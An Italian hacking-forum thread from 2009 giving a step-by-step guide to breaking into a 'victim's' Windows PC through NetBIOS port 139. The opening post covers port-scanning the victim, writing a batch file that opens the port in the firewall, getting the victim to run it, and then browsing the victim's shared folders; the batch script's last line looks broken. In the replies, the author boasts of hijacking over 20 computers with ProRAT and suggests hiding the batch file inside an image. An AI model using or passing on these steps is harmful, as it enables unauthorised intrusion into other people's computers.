-
-Gamemaster-.
User deleted
Dopo avere trovato l'IP della nostra vittima, come descritto nella scorsa guida, è arrivato il momento di sferrare l'attacco vero e proprio.
Uno dei metodi + efficaci è quello di utilizzare il netbios, di default abilitato su tutti gli o.s. Windows
Vediamo un po' come sfruttarlo
Come sempre sottolineo di provare tutto su vostri PC
1)Scarichiamo innanzitutto un utilissimo programma per tutti gli hacker, un port scanner (un programma che ci permette di sapere le porte aperte in un determinato IP), in questo caso la scelta cade su advanced port scanner: http://www.gold-software.com/download6744.html
2)Installiamo il programma e avviamolo
3)Inseriamo l'IP della vittima precedentemente trovato e premiamo scan
4)Aspettiamo il responso...
5)Se nell'elenco delle porte aperte è presente la 139 (o comunque una porta che riporta la dicitura "netbios") siamo a cavallo...la vittima non l'ha chiusa e il suo PC è molto vulnerabile.
--------------------------------
Ma se la porta 139 non è aperta...
1)Aprire blocco note;
2)Scrivere:CODICE@echo off
netsh firewall add portopening tcp 139
netsh firewall add portopening udp 139
netsh %SYSTEMDRIVE%
3)Salvare come "nomekevolete.bat" (virgolette escluse)
4)Inviare il file alla vittima e trovare il modo di farglielo aprire
----------------------------------------------------------------
6)Non ci rimane che aprire explorer e inserire nella barra degli indirizzi "\IP_DELLA_VITTIMA" (senza virgolette) e dare INVIO. (es. "\88.168.25.2")
7)Tutte le cartelle condivise dal PC saranno totalmente accessibili da voi
Nella prossima parte vedremo addirittura come sfruttare questa vulnerabilità per attacchi ancora più efficaci...
Stay tuned!. -
GDM1.
User deleted
Non avrà mai aperta la 139!!! E se è furbo non aprirà mai il bat che gli inviamo!! . -
@N63.
User deleted
CITAZIONE (GDM1 @ 2/8/2009, 18:59)Non avrà mai aperta la 139!!! E se è furbo non aprirà mai il bat che gli inviamo!!
OTTIMISTA il ragazzo molto ottimista
XD. -
-Gamemaster-.
User deleted
CITAZIONE (GDM1 @ 2/8/2009, 18:59)Non avrà mai aperta la 139!!! E se è furbo non aprirà mai il bat che gli inviamo!!
social engineering.... io cosi mi sono impossessato di oltre 20 computer.. in quel caso utilizzavo PRORAT.. comunque il bat puoi accoppiarlo con qualche immagine.... phorno se vogliamo xD con un comune accoppiatore di file. -
megas93.
User deleted
n63 questa storia ti ricorda qualcosa? a me si............... . -
Depa Marco.
User deleted
io sono riuscito a fargli aprire tt col social...
Grande Game!!. -
megas93.
User deleted
anche lui ci e riuscito................ . -
Depa Marco.
User deleted
CITAZIONE (megas93 @ 11/8/2009, 17:10)anche lui ci e riuscito................
beh, nn a caso è chiamato "il mago del social"...
rasseganti megas... accetta la sconfitta... ahahaha t'ha fregato!!!. -
-Gamemaster-.
User deleted
CITAZIONE (Depa Marco @ 12/8/2009, 09:06)CITAZIONE (megas93 @ 11/8/2009, 17:10)anche lui ci e riuscito................
beh, nn a caso è chiamato "il mago del social"...
rasseganti megas... accetta la sconfitta... ahahaha t'ha fregato!!!
che bel soprannome xD comunque ho giokato xD con megas per vedere se la sua protezione era buona..invece faceva schifo ed adesso e' protetto. -
MS-DOS.
User deleted
Carina come guida. Anche spiegata bene. Ma lo volete un consiglio ? Usate le Shell !!! . -
-Gamemaster-.
User deleted
Grazie ma la stanno copiando da tutto il mondo questa guida xD . -
vercingetorixe.
User deleted
ciao scusate l' ignoranza sono nuovo ma l' ip della vittima dove deve essere inserito? . -
Dave933.
User deleted
Ciao a tutti...ho fatto tutto come segue, ma quando vado ad inserire l'indirizzo ip sulla barra degli indirizzi mi da errori...eppure la porta 139 è aperta... .